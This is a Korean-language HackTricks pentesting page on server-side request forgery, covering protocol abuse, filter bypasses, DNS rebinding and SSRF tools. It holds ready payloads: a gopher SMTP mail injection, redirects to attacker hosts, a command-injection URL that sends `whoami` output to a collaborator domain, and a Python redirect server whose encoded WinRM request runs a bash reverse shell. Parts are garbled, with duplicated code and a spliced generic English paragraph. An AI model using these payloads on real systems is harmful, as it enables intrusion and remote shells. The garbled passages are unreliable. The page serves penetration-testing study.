hacktricks/pentesting-web/ssrf-server-side-request-forgery
2024-02-10 21:30:13 +00:00
..
cloud-ssrf.md Translated to Korean 2024-02-10 21:30:13 +00:00
README.md Translated to Korean 2024-02-10 21:30:13 +00:00
ssrf-vulnerable-platforms.md Translated to Korean 2024-02-10 21:30:13 +00:00
url-format-bypass.md Translated to Korean 2024-02-10 21:30:13 +00:00

SSRF (서버 측 요청 위조)


Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구를 활용한 워크플로우를 쉽게 구축하고 자동화하세요.
오늘 바로 액세스하세요:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

기본 정보

서버 측 요청 위조 (SSRF) 취약점은 공격자가 서버 측 애플리케이션을 조작하여 원하는 도메인으로 HTTP 요청을 보내도록 하는 것입니다. 이 취약점은 공격자가 지시한 임의의 외부 요청을 서버에 노출시킵니다.

SSRF 캡처

먼저 직접 생성한 SSRF 상호작용을 캡처해야 합니다. HTTP 또는 DNS 상호작용을 캡처하기 위해 다음과 같은 도구를 사용할 수 있습니다:

화이트리스트된 도메인 우회

일반적으로 SSRF가 작동하는 것은 특정 화이트리스트된 도메인 또는 URL에서만 작동하는 경우입니다. 다음 페이지에서는 해당 화이트리스트를 우회하기 위한 기법 모음을 찾을 수 있습니다:

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

오픈 리디렉션을 통한 우회

서버가 올바르게 보호되어 있다면 웹 페이지 내에서 오픈 리디렉션을 악용하여 모든 제한을 우회할 수 있습니다. 웹 페이지는 동일한 도메인으로의 SSRF를 허용하고 아마도 리디렉션을 따를 것이므로 오픈 리디렉션을 악용하여 서버가 내부 리소스에 액세스하도록 할 수 있습니다.
자세한 내용은 여기를 참조하세요: https://portswigger.net/web-security/ssrf

프로토콜

  • file://

  • file:// URL scheme은 /etc/passwd를 직접 가리킵니다: file:///etc/passwd

  • dict://

  • DICT URL scheme은 DICT 프로토콜을 통해 정의나 단어 목록에 액세스하는 데 사용됩니다. 주어진 예제에서는 특정 단어, 데이터베이스 및 항목 번호를 대상으로 하는 구성된 URL과 PHP 스크립트의 인스턴스가 공격자가 제공한 자격 증명을 사용하여 DICT 서버에 연결되는 데 잘못 사용될 수 있는 경우를 보여줍니다: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>

  • SFTP://

  • 안전한 셸을 통한 안전한 파일 전송을 위한 프로토콜로 식별되며, PHP 스크립트가 악성 SFTP 서버에 연결되는 방법을 보여주는 예제가 제공됩니다: url=sftp://generic.com:11111/

  • TFTP://

  • UDP를 통해 작동하는 Trivial File Transfer Protocol은 PHP 스크립트가 TFTP 서버에 요청을 보내도록 설계된 예제와 함께 언급됩니다. 'generic.com'의 '12346' 포트로 'TESTUDPPACKET' 파일에 대한 TFTP 요청이 수행됩니다: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET

  • LDAP://

  • 이 세그먼트에서는 경량 디렉터리 액세스 프로토콜인 LDAP을 다루며, IP 네트워크 상에서 분산 디렉터리 정보 서비스를 관리하고 액세스하는 데 사용됨을 강조합니다. 로컬호스트의 LDAP 서버와 상호작용: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.

  • SMTP

  • SSRF 취약점을 악용하여 로컬호스트의 SMTP 서비스와 상호작용하는 방법이 설명되며, 내부 도메인 이름을 공개하고 해당 정보를 기반으로 추가 조사 작업을 수행하는 단계가 제시됩니다.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
  • Curl URL globbing - WAF 우회
  • 만약 SSRF가 curl에 의해 실행된다면, curl은 URL globbing이라는 기능을 가지고 있는데, 이는 WAF 우회에 유용할 수 있습니다. 예를 들어, 이 기사에서는 file 프로토콜을 통한 경로 순회를 위한 예제를 찾을 수 있습니다.
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • Gopher://
  • Gopher 프로토콜은 서버 통신을 위해 IP, 포트 및 바이트를 지정할 수 있는 기능에 대해 설명하며, Gopherus와 remote-method-guesser와 같은 도구를 사용하여 페이로드를 작성하는 방법을 다룹니다. 두 가지 다른 사용 사례가 설명됩니다:

Gopher://

이 프로토콜을 사용하면 서버가 보낼 IP, 포트 및 바이트를 지정할 수 있습니다. 그런 다음, 기본적으로 SSRF를 악용하여 모든 TCP 서버와 통신할 수 있습니다 (단, 먼저 해당 서비스와 통신하는 방법을 알아야 합니다).
다행히도, Gopherus를 사용하여 여러 서비스에 대한 페이로드를 생성할 수 있습니다. 또한, remote-method-guesser를 사용하여 Java RMI 서비스에 대한 gopher 페이로드를 생성할 수 있습니다.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

Gopher HTTP is a technique used in Server-Side Request Forgery (SSRF) attacks. SSRF is a vulnerability that allows an attacker to make requests from the server to other internal or external resources. Gopher HTTP takes advantage of the Gopher protocol, which is a simple protocol used for retrieving documents over the Internet.

To perform a Gopher HTTP attack, the attacker crafts a URL that starts with the "gopher://" scheme instead of the usual "http://" or "https://". The URL is then followed by the IP address or domain name of the target server and the port number. After that, the attacker can specify the desired action, such as requesting a file or executing a command.

The Gopher protocol allows the attacker to bypass certain security measures, as it is not as widely monitored or filtered as HTTP or HTTPS. This makes it an attractive option for attackers looking to exploit SSRF vulnerabilities.

To protect against Gopher HTTP attacks, it is important to validate and sanitize user input, especially when making requests to external resources. Additionally, network filtering and monitoring can help detect and block suspicious Gopher requests.

Remember, understanding and being aware of different attack techniques like Gopher HTTP can help you better defend against them.

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP - 1337에 대한 백 커넥션

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

Referrer 헤더를 통한 SSRF 및 기타 방법

서버의 분석 소프트웨어는 종종 Referrer 헤더를 기록하여 들어오는 링크를 추적하는데, 이는 애플리케이션을 Server-Side Request Forgery (SSRF) 취약점에 노출시키는 실수로 이어집니다. 이는 분석 도구가 Referrer 헤더에 언급된 외부 URL을 방문하여 참조 사이트 콘텐츠를 분석하기 때문입니다. 이러한 취약점을 발견하기 위해 Burp Suite 플러그인 "Collaborator Everywhere"를 사용하는 것이 좋으며, 이는 분석 도구가 Referer 헤더를 처리하는 방식을 활용하여 잠재적인 SSRF 공격 표면을 식별합니다.

인증서의 SNI 데이터를 통한 SSRF

간단한 설정을 통해 어떤 백엔드에도 연결할 수 있는 잘못된 구성은 다음과 같은 Nginx 구성 예제로 설명됩니다:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

이 구성에서는 서버 이름 표시 (SNI) 필드의 값이 백엔드 주소로 직접 사용됩니다. 이 설정은 서버 측 요청 위조 (SSRF) 취약점을 노출시키며, SNI 필드에 원하는 IP 주소나 도메인 이름을 지정함으로써 악용될 수 있습니다. openssl 명령을 사용하여 internal.host.com과 같은 임의의 백엔드에 연결을 강제하는 악용 예제는 아래에 제시되었습니다:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

Wget 파일 업로드

명령 주입을 통한 SSRF

다음과 같은 페이로드를 시도해 볼 가치가 있습니다: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF 렌더링

웹 페이지가 제공한 정보로 PDF를 자동으로 생성하는 경우, PDF 생성자(서버) 자체에서 실행되는 JS를 삽입할 수 있으며, 이를 통해 SSRF를 악용할 수 있습니다. 여기에서 자세한 정보를 찾을 수 있습니다.

SSRF에서 DoS로

여러 세션을 생성하고 세션에서 SSRF를 이용하여 무거운 파일을 다운로드하려고 시도하세요.

SSRF PHP 함수

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

Gopher로의 SSRF 리디렉션

일부 공격에서는 리디렉션 응답을 보내야 할 수도 있습니다 (아마도 gopher와 같은 다른 프로토콜을 사용하기 위해). 여기에는 리디렉션으로 응답하는 다양한 파이썬 코드가 있습니다:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)

self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)


Trickest을 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화할 수 있습니다.
오늘 액세스하세요:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

DNS Rebidding CORS/SOP 우회

CORS/SOP로 인해 로컬 IP에서 콘텐츠를 유출하는 데 문제가 발생하는 경우, DNS Rebidding을 사용하여 이 제한을 우회할 수 있습니다:

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

자동화된 DNS Rebidding

Singularity of OriginDNS rebinding 공격을 수행하기 위한 도구입니다. 이 도구에는 공격 서버 DNS 이름의 IP 주소를 대상 기계의 IP 주소로 다시 바인딩하고 대상 기계의 취약한 소프트웨어를 공격하기 위한 공격 페이로드를 제공하는 필요한 구성 요소가 포함되어 있습니다.

http://rebind.it/singularity.html에서 공개적으로 실행 중인 서버도 확인해보세요.

DNS Rebidding + TLS 세션 ID/세션 티켓

요구 사항:

  • SSRF
  • 외부 TLS 세션
  • 로컬 포트에 있는 것들

공격:

  1. 사용자/봇에게 공격자가 제어하는 도메인액세스하도록 요청합니다.
  2. DNSTTL0초입니다(따라서 피해자는 곧 도메인의 IP를 다시 확인할 것입니다).
  3. 피해자와 공격자의 도메인 간에 TLS 연결이 생성됩니다. 공격자는 세션 ID 또는 세션 티켓 내에 페이로드를 삽입합니다.
  4. 도메인자기 자신에 대한 무한한 리디렉션 루프를 시작합니다. 이는 사용자/봇이 도메인에 계속 액세스하도록 만들기 위한 것입니다. 이 과정에서 사용자/봇은 도메인의 DNS 요청을 다시 수행합니다.
  5. DNS 요청에서는 이제 개인 IP 주소가 제공됩니다(예: 127.0.0.1).
  6. 사용자/봇은 TLS 연결을 다시 설정하려고 시도하고, 이를 위해 세션 ID/티켓 ID전송합니다(여기에는 공격자의 페이로드가 포함되어 있었습니다). 축하합니다. 사용자/봇에게 자기 자신을 공격하도록 요청했습니다.

이 공격 중에 localhost:11211 (memcache)를 공격하려면 피해자가 www.attacker.com:11211(포트는 항상 동일해야 함)와 초기 연결을 수립하도록 해야 합니다.
이 공격을 수행하기 위해 다음 도구를 사용할 수 있습니다: https://github.com/jmdx/TLS-poison/
이 공격에 대한 자세한 정보는 다음에서 확인할 수 있습니다: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

블라인드 SSRF와 비블라인드 SSRF의 차이점은 블라인드에서는 SSRF 요청의 응답을 볼 수 없다는 것입니다. 따라서 잘 알려진 취약점만을 공격할 수 있어 더 어렵게 이용할 수 있습니다.

시간 기반 SSRF

서버의 응답 시간을 확인하여 리소스가 존재하는지 여부를 알 수 있을 수 있습니다(존재하는 리소스에 액세스하는 데 더 많은 시간이 소요될 수 있습니다).

Cloud SSRF Exploitation

클라우드 환경에서 실행 중인 기계에서 SSRF 취약점을 발견하면 클라우드 환경에 대한 흥미로운 정보와 자격 증명을 얻을 수 있습니다:

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

SSRF 취약한 플랫폼

여러 알려진 플랫폼에는 SSRF 취약점이 포함되어 있거나 포함되어 있었던 경우가 있습니다. 이를 확인하려면 다음을 참조하세요:

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

도구

SSRFMap

SSRF 취약점을 감지하고 이용하는 도구

Gopherus

이 도구는 다음을 위한 Gopher 페이로드를 생성합니다:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

_remote-method-guesser_는 대부분의 일반적인 Java RMI 취약점에 대한 공격 작업을 지원하는 Java RMI 취약점 스캐너입니다. 사용 가능한 대부분의 작업은 요청된 작업에 대한 SSRF 페이로드를 생성하기 위한 --ssrf 옵션을 지원합니다. --gopher 옵션과 함께 사용하면 준비된 gopher 페이로드를 직접 생성할 수 있습니다.

SSRF Proxy

SSRF에 취약한 서버를 통해 클라이언트 HTTP 트래픽을 터널링하는 멀티 스레드 HTTP 프록시 서버

연습하기

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

참고 자료